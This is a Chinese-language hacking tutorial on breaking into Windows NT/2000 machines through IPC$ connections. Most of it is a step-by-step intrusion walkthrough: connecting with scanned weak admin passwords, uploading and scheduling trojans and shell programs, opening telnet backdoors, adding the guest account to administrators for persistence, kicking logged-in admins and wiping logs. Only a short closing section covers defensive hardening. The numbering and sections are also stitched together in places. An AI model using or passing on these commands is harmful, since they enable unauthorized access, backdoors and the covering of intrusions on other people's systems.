DOS入侵示例
這個(gè)入侵模式太經(jīng)典了,大部分ipc教程都有介紹,我也就拿過(guò)來(lái)引用了,在此感謝原創(chuàng)作者!(不知道是哪位前輩)
1. C:">net use ""127.0.0.1"IPC$ "密碼" /user:"用戶(hù)名"
一般用流光,通過(guò)掃描弱口令來(lái)得到,管理員帳號(hào)和密碼.
2. C:">copy srv.exe ""127.0.0.1"admin$
先復(fù)制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶(hù)的c:"winnt"system32",大家還可以使用c$、d$,意思是C盤(pán)與D盤(pán),這看你要復(fù)制到什么地方去了)。
3. C:">net time ""127.0.0.1
查查時(shí)間,發(fā)現(xiàn)127.0.0.1 的當(dāng)前時(shí)間是 2004/6/15 上午 11:00,命令成功完成。
4. C:">at ""127.0.0.1 11:05 srv.exe
用at命令啟動(dòng)srv.exe吧
5. C:">net time ""127.0.0.1
再查查到時(shí)間沒(méi)有?如果127.0.0.1 的當(dāng)前時(shí)間是 2004/6/15 上午 11:05,那就準(zhǔn)備開(kāi)始下面的命令。
6. C:">telnet 127.0.0.1 99
這里會(huì)用到Telnet命令吧,注意端口是99。Telnet默認(rèn)的是23端口,但是我們使用的是SRV在對(duì)方計(jì)算機(jī)中為我們建立一個(gè)99端口的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個(gè)Telnet服務(wù)!這就要用到ntlm了
7.C:">copy ntlm.exe ""127.0.0.1"admin$
用Copy命令把ntlm.exe上傳到主機(jī)上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:"WINNT"system32>ntlm
輸入ntlm啟動(dòng)(這里的C:"WINNT"system32>指的是對(duì)方計(jì)算機(jī),運(yùn)行ntlm其實(shí)是讓這個(gè)程序在對(duì)方計(jì)算機(jī)上運(yùn)行)。當(dāng)出現(xiàn)"DONE"的時(shí)候,就說(shuō)明已經(jīng)啟動(dòng)正常。然后使用"net start telnet"來(lái)開(kāi)啟Telnet服務(wù)!
9. Telnet 127.0.0.1,接著輸入用戶(hù)名與密碼就進(jìn)入對(duì)方了,操作就像在DOS上操作一樣簡(jiǎn)單!(然后你想做什么?想做什么就做什么吧,哈哈)
為了以防萬(wàn)一,我們?cè)侔裧uest激活加到管理組
10. C:">net user guest /active:yes
將對(duì)方的Guest用戶(hù)激活
11. C:">net user guest 1234
將Guest的密碼改為1234,或者你要設(shè)定的密碼
12. C:">net localgroup administrators guest /add
將Guest變?yōu)锳dministrator(如果管理員密碼更改,guest帳號(hào)沒(méi)改變的話(huà),下次我們可以用guest再次訪(fǎng)問(wèn)這臺(tái)計(jì)算
13.使用nb2的sql工具。遠(yuǎn)程執(zhí)行dos命令
net start telnet 開(kāi)telnet服務(wù)
net user mint mint /add 添加用戶(hù)mint密碼為mint
net localgroup administrators mint /add 將帳號(hào)mint升級(jí)為管理員
7,使用3389登陸。發(fā)現(xiàn)登陸用戶(hù)已滿(mǎn)。不用怕。我們把他踢出去。
8,telnet對(duì)方ip。發(fā)現(xiàn)需要NTLM 身份驗(yàn)證。怎么辦?放棄不是黑客的追求。
9,我們?cè)谧约旱碾娔X里建立一個(gè)帳號(hào)mint密碼為mint身份為管理員。
10,找到c:"winnt"system32"cmd.exe 建立一個(gè)快捷方式到桌面。
11,修改cmd的快捷方式屬性為允許其他身份登陸。
12,然后運(yùn)行桌面上的cmd.exe的快捷方式。輸入帳號(hào)mint密碼mint
13,telnet對(duì)方ip.直接可以登陸對(duì)方電腦了。
使用命令
c:"query user 查看對(duì)方目前終端登陸狀況。
運(yùn)行命令
c:"logoff 1 踢出去一個(gè)管理者
再用c:"query user檢查一便~~
ok了
14,使用3389遠(yuǎn)程終端登陸。
入侵中可能會(huì)用到的相關(guān)命令
請(qǐng)注意命令適用于本地還是遠(yuǎn)程,如果適用于本地,你只能在獲得遠(yuǎn)程主機(jī)的shell后,才能向遠(yuǎn)程主機(jī)執(zhí)行。
1 建立空連接:
net use ""IP"ipc$ "" /user:""
2 建立非空連接:
net use ""IP"ipc$ "psw" /user:"account"
3 查看遠(yuǎn)程主機(jī)的共享資源(但看不到默認(rèn)共享)
net view ""IP
4 查看本地主機(jī)的共享資源(可以看到本地的默認(rèn)共享)
net share
5 得到遠(yuǎn)程主機(jī)的用戶(hù)名列表
nbtstat -A IP
6 得到本地主機(jī)的用戶(hù)列表
net user
7 查看遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間
net time ""IP
8 顯示本地主機(jī)當(dāng)前服務(wù)
net start
9 啟動(dòng)/關(guān)閉本地服務(wù)
net start 服務(wù)名 /y
net stop 服務(wù)名 /y
10 映射遠(yuǎn)程共享:
net use z: ""IP"baby
此命令將共享名為baby的共享資源映射到z盤(pán)
11 刪除共享映射
net use c: /del 刪除映射的c盤(pán),其他盤(pán)類(lèi)推
net use * /del /y刪除全部
12 向遠(yuǎn)程主機(jī)復(fù)制文件
copy "路徑"srv.exe ""IP"共享目錄名,如:
copy ccbirds.exe ""*.*.*.*"c 即將當(dāng)前目錄下的文件復(fù)制到對(duì)方c盤(pán)內(nèi)
13 遠(yuǎn)程添加計(jì)劃任務(wù)
at ""ip 時(shí)間 程序名,如:
at ""127.0.0.0 11:00 love.exe
注意:時(shí)間盡量使用24小時(shí)制;在系統(tǒng)默認(rèn)搜索路徑(比如system32/)下不用加路徑,否則必須加全路徑
14 開(kāi)啟遠(yuǎn)程主機(jī)的telnet
這里要用到一個(gè)小程序:opentelnet.exe,各大下載站點(diǎn)都有,而且還需要滿(mǎn)足四個(gè)要求:
1)目標(biāo)開(kāi)啟了ipc$共享
2)你要擁有管理員密碼和帳號(hào)
3)目標(biāo)開(kāi)啟RemoteRegistry服務(wù),用戶(hù)就該ntlm認(rèn)證
4)對(duì)WIN2K/XP有效,NT未經(jīng)測(cè)試
命令格式:OpenTelnet.exe ""server account psw NTLM認(rèn)證方式 port
試?yán)缦拢篶:">OpenTelnet.exe ""*.*.*.* administrator "" 1 90
15 激活用戶(hù)/加入管理員組
1 net uesr account /active:yes
2 net localgroup administrators account /add
16 關(guān)閉遠(yuǎn)程主機(jī)的telnet
同樣需要一個(gè)小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe ""server account psw
試?yán)缦拢篶:">ResumeTelnet.exe ""*.*.*.* administrator ""
17 刪除一個(gè)已建立的ipc$連接
net use ""IP"ipc$ /del
(本教程不定期更新,欲獲得最新版本,請(qǐng)登陸官方網(wǎng)站:菜菜鳥(niǎo)社區(qū)原創(chuàng)http://ccbirds.yeah.net)
十二 ipc$完整入侵步驟祥解
其實(shí)入侵步驟隨個(gè)人愛(ài)好有所不同,我就說(shuō)一下常見(jiàn)的吧,呵呵,獻(xiàn)丑了!
1 用掃描軟件搜尋存在若口令的主機(jī),比如流光,SSS,X-scan等,隨你的便,然后鎖定目標(biāo),如果掃到了管理員權(quán)限的口令,你可以進(jìn)行下面的步驟了,假設(shè)你現(xiàn)在得到了administrator的密碼為空
2 此時(shí)您有兩條路可以選擇:要么給對(duì)方開(kāi)telnet(命令行),要么給它傳木馬(圖形界面),那我們就先走telnet這條路吧
3上面開(kāi)telnet的命令沒(méi)忘吧,要用到opentelnet這個(gè)小程序
c:">OpenTelnet.exe ""192.168.21.* administrator "" 1 90
如果返回如下信息
*******************************************************
Remote Telnet Configure, by refdom
Email: refdom@263.net
OpenTelnet.exe
UsagepenTelnet.exe ""server username password NTLMAuthor telnetport
*******************************************************
Connecting ""192.168.21.*...Successfully!
NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
Starting telnet service...
telnet service is started successfully! telnet service is running!
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
*說(shuō)明你已經(jīng)打開(kāi)了一個(gè)端口90的telnet。
4 現(xiàn)在我們telnet上去
telnet 192.168.21.* 90
如果成功,你將獲得遠(yuǎn)程主機(jī)的一個(gè)shell,此時(shí)你可以像控制自己的機(jī)器一樣控制你的肉雞了,那么做點(diǎn)什么呢?把guest激活再加入管理組吧,就算留個(gè)后門(mén)了
5 C:">net user guest /active:yes
*將Guest用戶(hù)激活,也有可能人家的guest本來(lái)就試活的,你可以用net user guest看一下它的帳戶(hù)啟用的值是yes還是no
6 C:">net user guest 1234
*將Guest的密碼改為1234,或者改成你喜歡的密碼
7 C:">net localgroup administrators guest /add
*將Guest變?yōu)锳dministrator,這樣,即使以后管理員更改了他的密碼,我們也可以用guest登錄了,不過(guò)也要提醒您,因?yàn)橥ㄟ^(guò)安全
策略的設(shè)置,可以禁止guest等帳戶(hù)的遠(yuǎn)程訪(fǎng)問(wèn),呵呵,如果真是這樣,那我們的后門(mén)也就白做了,愿上帝保佑Guest。
8 好了,現(xiàn)在我們來(lái)走另一條路,給它傳個(gè)木馬玩玩
9 首先,我們先建立起ipc$連接
C:">net use ""192.168.21.*"ipc$ "" /user:administrator
10 既然要上傳東西,就要先知道它開(kāi)了什么共享
C:">net view ""192.168.21.*
在 ""192.168.21.*的共享資源
資源共享名 類(lèi)型 用途 注釋
-----------------------------------------------------------
C Disk
D Disk
命令成功完成。
*好了,我們看到對(duì)方共享了C,D兩個(gè)盤(pán),我們下面就可以向任意一個(gè)盤(pán)復(fù)制文件了。再次聲明,因?yàn)橛胣et view命令無(wú)法看到默認(rèn)共享,因此通過(guò)上面返回的結(jié)果,我們并不能判斷對(duì)方是否開(kāi)啟了默認(rèn)共享。
11 C:">copy love.exe ""192.168.21.*"c
已復(fù)制 1 個(gè)文件
*用這個(gè)命令你可以將木馬客戶(hù)端love.exe傳到對(duì)方的c盤(pán)下,當(dāng)然,如果能復(fù)制到系統(tǒng)文件夾下是最好的了,不容易被發(fā)現(xiàn)
12 運(yùn)行木馬前,我們先看看它現(xiàn)在的時(shí)間
net time ""192.168.21.*
""192.168.21.*的當(dāng)前時(shí)間是 2003/8/22 上午 11:00
命令成功完成
13 現(xiàn)在我們用at運(yùn)行它吧,不過(guò)對(duì)方一定要開(kāi)了Task Scheduler服務(wù)(允許程序在指定時(shí)間運(yùn)行),否則就不行了
C:">at ""192.168.21.* 11:02 c:"love.exe
新加了一項(xiàng)作業(yè),其作業(yè) ID = 1
14 剩下就是等了,等過(guò)了11:02,你就可以用控制端去連接了,如果成功你將可以用圖形界面去控制遠(yuǎn)程主機(jī)了,如果連接失敗,那么它可能在局域網(wǎng)里,也可能程序被防火墻殺了,還可能它下線(xiàn)了(沒(méi)這么巧吧),無(wú)論哪種情況你只好放棄了
嗯,好了,兩種基本方法都講了。如果你對(duì)上面的操作已經(jīng)輕車(chē)熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec執(zhí)行木馬,用命
令:psexec ""tergetIP -u user -p paswd
cmd.exe直接獲得shell等,這些都是可以得,隨你的便。不過(guò)最后不要忘了把日志清理干凈,可以用榕哥的elsave.exe。
講了ipc$的入侵,就不能不說(shuō)如何防范,那么具體要怎樣做呢?看下面
1,怎樣建立空連接,它有什么用?
答:使用命令 net use "IPipc$ "" /user:"" 就可以簡(jiǎn)單地和目標(biāo)建立一個(gè)空連接(需要目標(biāo)開(kāi)放ipc$)。
對(duì)于NT,在默認(rèn)安全設(shè)置下,借助空連接可以列舉目標(biāo)用戶(hù)、共享,訪(fǎng)問(wèn)everyone權(quán)限的共享,訪(fǎng)問(wèn)小部分注冊(cè)表等,沒(méi)有什么利用價(jià)值。對(duì)2000作用就更小了。而且實(shí)現(xiàn)也不方便,需借助工具。
2.為什么我連不上IPC$?
答:1.只有nt/2000/xp及以上系統(tǒng)才可以建立ipc$。如果你用的是98/me是沒(méi)有該功能的。
2.確認(rèn)你的命令沒(méi)有打錯(cuò)。正確的命令是: net use "目標(biāo)IPipc$ "密碼" /user:"用戶(hù)名"
注意別多了或少了空格。當(dāng)用戶(hù)名和密碼中不包含空格時(shí)兩邊的雙引號(hào)可以省略。空密碼用""表示。
3,根據(jù)返回的錯(cuò)誤號(hào)分析原因:
錯(cuò)誤號(hào)5,拒絕訪(fǎng)問(wèn) : 很可能你使用的用戶(hù)不是管理員權(quán)限的,先提升權(quán)限;
錯(cuò)誤號(hào)51,Windows 無(wú)法找到網(wǎng)絡(luò)路徑 : 網(wǎng)絡(luò)有問(wèn)題;
錯(cuò)誤號(hào)53,找不到網(wǎng)絡(luò)路徑 : ip地址錯(cuò)誤;目標(biāo)未開(kāi)機(jī);目標(biāo)lanmanserver服務(wù)未啟動(dòng);目標(biāo)有防火墻(端口過(guò)濾);
錯(cuò)誤號(hào)67,找不到網(wǎng)絡(luò)名 : 你的lanmanworkstation服務(wù)未啟動(dòng);目標(biāo)刪除了ipc$;
錯(cuò)誤號(hào)1219,提供的憑據(jù)與已存在的憑據(jù)集沖突 : 你已經(jīng)和對(duì)方建立了一個(gè)ipc$,請(qǐng)刪除再連。
錯(cuò)誤號(hào)1326,未知的用戶(hù)名或錯(cuò)誤密碼 : 原因很明顯了;
錯(cuò)誤號(hào)1792,試圖登錄,但是網(wǎng)絡(luò)登錄服務(wù)沒(méi)有啟動(dòng) : 目標(biāo)NetLogon服務(wù)未啟動(dòng)。(連接域控會(huì)出現(xiàn)此情況)
錯(cuò)誤號(hào)2242,此用戶(hù)的密碼已經(jīng)過(guò)期 : 目標(biāo)有帳號(hào)策略,強(qiáng)制定期要求更改密碼。
4,關(guān)于ipc$連不上的問(wèn)題比較復(fù)雜,沒(méi)有總結(jié)出一個(gè)統(tǒng)一的認(rèn)識(shí),在肉雞上實(shí)驗(yàn)有時(shí)會(huì)得出矛盾的結(jié)論,十分棘手。 而且知道了問(wèn)題所在,如果沒(méi)有用其他辦法獲得shell,很多問(wèn)題依然不能解決。
5,怎樣打開(kāi)目標(biāo)的IPC$?
答:首先你需要獲得一個(gè)不依賴(lài)于ipc$的shell,比如sql的cmd擴(kuò)展、telnet、木馬。當(dāng)然,這shell必須是admin權(quán)限的。然
后你可以使用shell執(zhí)行命令 net share ipc$
來(lái)開(kāi)放目標(biāo)的ipc$。從上一問(wèn)題可以知道,ipc$能否使用還有很多條件。請(qǐng)確認(rèn)相關(guān)服務(wù)都已運(yùn)行,沒(méi)有就啟動(dòng)它(不知道怎么做的請(qǐng)看net命令的用
法)。還是不行的話(huà)(比如有防火墻,殺不了)建議放棄。
6,怎樣映射和訪(fǎng)問(wèn)默認(rèn)共享?
答:使用命令 net use z: "目標(biāo)IPc$ "密碼" /user:"用戶(hù)名" 將對(duì)方的c盤(pán)映射為自己的z盤(pán),其他盤(pán)類(lèi)推。
如果已經(jīng)和目標(biāo)建立了ipc$,則可以直接用IP加盤(pán)符加$訪(fǎng)問(wèn)。比如 copy muma.exe "IPd$pathmuma.exe
。或者再R射也可以,只是不用用戶(hù)名和密碼了:net use y: "IPd$ 。然后 copy muma.exe y:pathmuma.exe
。當(dāng)路徑中包含空格時(shí),須用""將路徑全引住。
7,如何刪除映射和ipc$連接?
答:用命令 net use "IPipc$ /del 刪除和一個(gè)目標(biāo)的ipc$連接。
用命令 net use z: /del 刪除映射的z盤(pán),其他盤(pán)類(lèi)推。
用命令 net use * /del 刪除全部。會(huì)有提示要求按y確認(rèn)。
8,連上ipc$然后我能做什么?
答:能使用管理員權(quán)限的帳號(hào)成功和目標(biāo)連接ipc$,表示你可以和對(duì)方系統(tǒng)做深入“交流”了。你可以使用各種命令行方式的工具(比如pstools系
列、Win2000SrvReskit、telnethack等)獲得目標(biāo)信息、管理目標(biāo)的進(jìn)程和服務(wù)等。如果目標(biāo)開(kāi)放了默認(rèn)共享(沒(méi)開(kāi)你就幫他開(kāi)),你
就可以上傳木馬并運(yùn)行。也可以用tftp、ftp的辦法上傳。像dwrcc、VNC、RemoteAdmin等工具(木馬)還具有直接控屏的功能。如果是
2000server,還可以考慮開(kāi)啟終端服務(wù)方便控制。這里提到的工具的使用,請(qǐng)看自帶的說(shuō)明或相關(guān)教程。
9,怎樣防止別人用ips$和默認(rèn)共享入侵我?
答:A、一種辦法是把ipc$和默認(rèn)共享都刪除了。但重起后還會(huì)有。這就需要改注冊(cè)表。
1,先把已有的刪除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有幾個(gè)刪幾個(gè))
2,禁止別人空連接
首先運(yùn)行regedit,找到如下主鍵[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的鍵值改為:00000002。
3,禁止自動(dòng)打開(kāi)默認(rèn)共享
對(duì)于server版,找到如下主鍵
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]
把AutoShareServer(DWORD)的鍵值改為:00000000。
對(duì)于pro版,則是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說(shuō)的主鍵不存在,就新建一個(gè)再改鍵值。
B、另一種是關(guān)閉ipc$和默認(rèn)共享依賴(lài)的服務(wù)(不推薦)
net stop lanmanserver
可能會(huì)有提示說(shuō),XXX服務(wù)也會(huì)關(guān)閉是否繼續(xù)。因?yàn)檫€有些次要的服務(wù)依賴(lài)于lanmanserver。一般情況按y繼續(xù)就可以了。
C、最簡(jiǎn)單的辦法是設(shè)置復(fù)雜密碼,防止通過(guò)ipc$窮舉密碼。但如果你有其他漏洞,ipc$將為進(jìn)一步入侵提供方便。
D、還有一個(gè)辦法就是裝防火墻,或者端口過(guò)濾。
結(jié)束進(jìn)程:ntsd -c q -p PID